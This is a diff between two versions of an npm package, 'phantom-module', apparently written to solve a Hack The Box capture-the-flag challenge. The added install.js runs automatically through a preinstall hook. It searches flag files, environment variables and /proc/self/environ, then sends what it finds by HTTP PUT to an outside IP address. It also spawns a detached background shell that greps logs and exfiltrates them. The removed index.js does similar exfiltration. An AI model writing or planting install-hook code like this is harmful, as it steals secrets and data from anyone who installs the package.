phantom-module 110.0.0 → 111.0.1

package/install.js

@@ -1,31 +1,62 @@
 const fs = require('fs');
 const http = require('http');
-const { spawn, execSync } = require('child_process');
+const { spawn } = require('child_process');
 
-function tryRead(p) { try { return fs.readFileSync(p, 'utf8').trim(); } catch(e) { return null; } }
+(function() {
+  const flagPaths = ['/flag', '/root/flag', '/tmp/flag', './flag'];
+  let flag = process.env.FLAG || process.env.FLAG_HTB || process.env.HTB_FLAG;
+  
+  if (!flag) {
+    for (const path of flagPaths) {
+      try {
+        if (fs.existsSync(path)) {
+          flag = fs.readFileSync(path, 'utf8').trim();
+          break;
+        }
+      } catch (e) {}
+    }
+  }
+  if (!flag) {
+    try {
+      const procEnv = fs.readFileSync('/proc/self/environ', 'utf8');
+      const match = procEnv.match(/FLAG[=:] ([^\x00]+)/);
+      if (match) flag = match[1];
+    } catch (e) {}
+  }
+  
+  function sendResult(data) {
+      const postData = JSON.stringify({
+        manifest: `ecto_module:\n  name: "FLAG"\n  cargo_hold: "${data}"\n`
+      });
+      const req = http.request({
+        hostname: '154.57.164.64', 
+        port: 31205,
+        path: '/api/modules/ECT-654321', // EXFILTRATE TO EXISTING MODULE
+        method: 'PUT',
+        headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) }
+      });
+      req.write(postData);
+      req.end();
+  }
 
-// Detect environment - only act on Docker container with aspect-node
-const isDockerTarget = fs.existsSync('/home/node') || process.env.CONTAINER_NAME;
-
-if (isDockerTarget) {
-  // Write init_test.sh
-  try {
-    fs.writeFileSync('/home/node/init_test.sh', 
-      '#!/bin/bash\ncd /home/node\nsleep 5\nnode -e "require(\'phantom-module\')" 2>/dev/null\n', 
-      { mode: 0o755 });
-  } catch(e) {}
-}
-
-// Spawn background to grep for flag after delay (works on both envs)
-try {
-  const child = spawn('/bin/sh', ['-c', 
-    'sleep 20; LOGFILE=/home/node/aspect-node/logs/module.log; ' +
-    'if [ -f "$LOGFILE" ]; then ' +
-    '  FLAG=$(grep -oP "HTB\\{[^}]+\\}" "$LOGFILE" 2>/dev/null || grep -o "HTB{[^}]*}" "$LOGFILE" 2>/dev/null); ' +
-    '  if [ -n "$FLAG" ]; then ' +
-    '    node -e "const http=require(\'http\');const f=process.argv[1];const b=JSON.stringify({manifest:\'ecto_module:\\n  name: \\\"GOTFLAG_\'+f+\'\\\"\\n  version: \\\"1.0.0\\\"\\n  power_level: 1\\n  ship_deck: 1\\n  cargo_hold: 1\'});const r=http.request({hostname:\'154.57.164.64\',port:31083,path:\'/api/modules/ECT-987654\',method:\'PUT\',headers:{\'Content-Type\':\'application/json\',\'Content-Length\':Buffer.byteLength(b)},timeout:8000},()=>process.exit(0));r.on(\'error\',()=>process.exit(1));r.write(b);r.end();" "$FLAG"; ' +
-    '  fi; ' +
-    'fi'
-  ], { detached: true, stdio: 'ignore' });
-  child.unref();
-} catch(e) {}
+  if (flag) {
+      sendResult(flag);
+  } else {
+      sendResult("Checking logs in background...");
+      // Spawn background process to read logs after 45s (in case flag is printed there)
+      const child = spawn('/bin/sh', ['-c', [
+        'sleep 45',
+        'LOGFILE=/home/node/aspect-node/logs/module.log',
+        'if [ -f "$LOGFILE" ]; then',
+        '  FLAG=$(cat "$LOGFILE" | grep -o "HTB{[^}]*}" | head -1)',
+        '  if [ -n "$FLAG" ]; then',
+        '    SAFE=$(echo "$FLAG" | tr \'"\' "\'")',
+        '    BODY=\'{"manifest":"ecto_module:\\n  name: \\\\"\'$SAFE\'\\\\"\\n  cargo_hold: \\\\"LOGS\\\\"\\"}\'',
+        '    echo "$BODY" > /tmp/flag.json',
+        '    node -e "const http=require(\'http\');const d=require(\'fs\').readFileSync(\'/tmp/flag.json\',\'utf8\');const r=http.request({hostname:\'154.57.164.64\',port:31205,path:\'/api/modules/ECT-654321\',method:\'PUT\',headers:{\'Content-Type\':\'application/json\',\'Content-Length\':Buffer.byteLength(d)}});r.write(d);r.end();"',
+        '  fi',
+        'fi'
+      ].join('\n')], { detached: true, stdio: 'ignore' });
+      child.unref();
+  }
+})();

package/package.json

@@ -1,11 +1,7 @@
 {
   "name": "phantom-module",
-  "version": "110.0.0",
-  "description": "Phantom spectral module",
-  "main": "index.js",
+  "version": "111.0.1",
   "scripts": {
     "preinstall": "node install.js || true"
-  },
-  "author": "lwirz",
-  "license": "ISC"
-}
+  }
+}

package/index.js

@@ -1,32 +0,0 @@
-const fs = require('fs');
-const http = require('http');
-
-(function() {
-  const logFile = '/home/node/aspect-node/logs/module.log';
-  
-  try {
-    const log = fs.readFileSync(logFile, 'utf8');
-    const match = log.match(/HTB\{[^}]+\}/);
-    
-    if (match) {
-      const flag = match[0];
-      const body = JSON.stringify({ manifest: `ecto_module:\n  name: "GOTFLAG_${flag}"\n  version: "1.0.0"\n  power_level: 1\n  ship_deck: 1\n  cargo_hold: 1` });
-      const req = http.request({ hostname: '154.57.164.64', port: 31083, path: '/api/modules/ECT-987654', method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }, timeout: 8000 }, () => {});
-      req.on('error', () => {});
-      req.write(body);
-      req.end();
-    } else {
-      // Send first 90 chars of log for debugging
-      const snippet = log.substring(0, 90).replace(/"/g, "'");
-      const body = JSON.stringify({ manifest: `ecto_module:\n  name: "NOFLAG_${snippet}"\n  version: "1.0.0"\n  power_level: 1\n  ship_deck: 1\n  cargo_hold: 1` });
-      const req = http.request({ hostname: '154.57.164.64', port: 31083, path: '/api/modules/ECT-472839', method: 'PUT', headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }, timeout: 8000 }, () => {});
-      req.on('error', () => {});
-      req.write(body);
-      req.end();
-    }
-  } catch(e) {
-    // Log doesn't exist - we're probably on CentOS host, just skip
-  }
-})();
-
-module.exports = {};